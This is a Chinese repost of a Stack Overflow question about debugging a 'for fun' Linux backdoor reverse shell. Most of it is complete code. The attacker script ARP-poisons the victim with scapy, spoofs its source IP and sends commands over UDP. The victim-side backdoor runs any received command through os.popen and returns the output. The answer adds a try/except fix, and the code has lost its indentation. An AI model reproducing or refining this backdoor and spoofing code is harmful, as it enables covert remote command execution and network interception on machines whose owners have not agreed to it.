gpt4 book ai didi

python - 如何在反向 shell 中处理 rm 和 cp 命令

转载 作者:太空宇宙 更新时间:2023-11-04 12:09:24 25 4
gpt4 key购买 nike

为了好玩,我正在为 Linux 后门创建一个反向 shell,并且我让它工作到一定程度。大多数命令的工作方式类似于“cd”、“ifconfig”和“ls”。但是像“cp”和“rm”这样的命令在受害者计算机上工作,但我这边(攻击者)没有得到任何输出,当我尝试“rm”或“cp”时出现这个错误:

enter image description here

你们能帮我尝试解决这个问题吗?我知道 cp 实际上并没有输出任何东西,我的程序需要一个输出。即使我最终收到此错误,当我查看受害者时,我仍然可以看到操作(cp 或 rm)正在执行。另一种选择是每当我遇到此错误时,我都可以让我的程序再次提示输入命令。

任何帮助都会生病!

攻击者代码:

import sys
import socket
import threading
import time
from logging import getLogger, ERROR
from scapy.all import *

getLogger('scapy.runtime').setLevel(ERROR)

try:
victimIP = raw_input('Enter victim IP: ')
spoofIP = raw_input('Enter IP you want to spoof: ')
IF = raw_input('Enter network interface: ')
except KeyboardInterrupt:
print '[!] User Interrupted Input'
sys.exit(1)

conf.verb = 0

def getMAC():
try:
pkt = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = victimIP), timeout = 2, iface = IF, inter = 0.1)
except Exception:
print '[!] Failed to Resolve Victim MAC Address'
sys.exit(1)
for snd, rcv in pkt[0]:
return rcv.sprintf(r"%Ether.src%")
print '\n[*] Resolving Victim MAC Address... '
victimMAC = getMAC()


spoofStatus = True
def poison():
while 1:
if spoofStatus == False:
break
return
send(ARP(op=2, pdst=victimIP, psrc=spoofIP, hwdst=victimMAC))
time.sleep(5)

print '\n[*] Starting Spoofer Thread...'
thread = []
try:
poisonerThread = threading.Thread(target=poison)
thread.append(poisonerThread)
poisonerThread.start()
print '[*] Thread Started Successfully\n'
except Exception:
print '[!] Failed to Start Thread'
sys.exit(1)

print 'Initializing connection with victim...'
pkt1 = sr1(IP(dst=victimIP, src=spoofIP)/UDP(sport=77, dport=77)/Raw(load='hello victim'))
pkt2 = sr1(IP(dst=victimIP, src=spoofIP)/UDP(sport=77, dport=77)/Raw(load='report'))

prompt = pkt2.getlayer(Raw).load

print 'Initialization Complete'
print '[*] Enter "goodbye" to Stop Connection\n'

while 1:
command = raw_input(prompt)
sendcom = sr1(IP(dst=victimIP, src=spoofIP)/UDP(sport=77, dport=77)/Raw(load=command))
output = sendcom.getlayer(Raw).load
if command.strip() == 'goodbye':
print '\nGrabbing Threads...'
spoofStatus = False
poisonerThread.join()
sys.exit(1)
print output

受害者代码:

import socket
import os
import sys
import platform

def launch():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', 77))
launch = s.recvfrom(1024)
addr = launch[1][0]
port = launch[1][1]
s.sendto('hello paul', (addr, port))
return s, addr, port

s, addr, port = launch()

def getsysinfo():
que = s.recvfrom(1024)
prompt = []
if que[1][0] == addr and que[1][1] == port:
if os.getuid() == 0:
prompt.append('root@')
prompt.append('# ')
else:
prompt.append('user@')
prompt.append('$ ')
prompt.insert(1, platform.dist()[0])
s.sendto(''.join(prompt), (addr, port))
return

getsysinfo()

def shell():
while 1:
try:
command = s.recv(1024)
if command.strip().split()[0] == 'cd':
os.chdir(command.strip('cd '))
s.sendto('Changed Directory', (addr, port))
elif command.strip() == 'goodbye':
s.sendto('Goodbye paul', (addr, port))
s.close()
break
else:
proc = os.popen(command)
output = ''
for i in proc.readlines():
output += i
output = output.strip()
s.sendto(output, (addr, port))
except Exception:
s.sendto('An unexpected error has occured', (addr, port))
pass

shell()

最佳答案

我通过添加这段代码修复了它:

try:
output = sendcom.getlayer(Raw).load
except AttributeError:
continue

关于python - 如何在反向 shell 中处理 rm 和 cp 命令,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/49481048/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com